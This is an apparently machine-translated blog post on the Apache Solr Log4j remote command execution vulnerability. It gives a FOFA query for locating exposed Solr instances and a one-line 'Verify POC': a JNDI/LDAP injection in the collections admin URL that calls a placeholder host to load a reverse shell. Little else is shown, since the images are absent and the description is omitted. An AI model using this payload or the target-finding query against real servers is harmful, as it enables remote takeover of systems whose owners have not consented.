Post

Apache Solr Log4j component Remote command execution vulnerability

Apache Solr Log4j component Remote command execution vulnerability

Apache Solr Log4j component Remote command execution vulnerability

Vulnerability Description

Apache Solr Log4j component Remote command execution vulnerability, details are omitted

Vulnerability Impact

Apache Solr

Network surveying and mapping

FOFA: app="APACHE-Solr" </a-checkbox>

Vulnerability reappears

Login page

img

Verify POC

1
/solr/admin/collections?action=${jndi:ldap://xxx/Basic/ReverseShell/ip/87}&wt=json

img

This post is licensed under CC BY 4.0 by the author.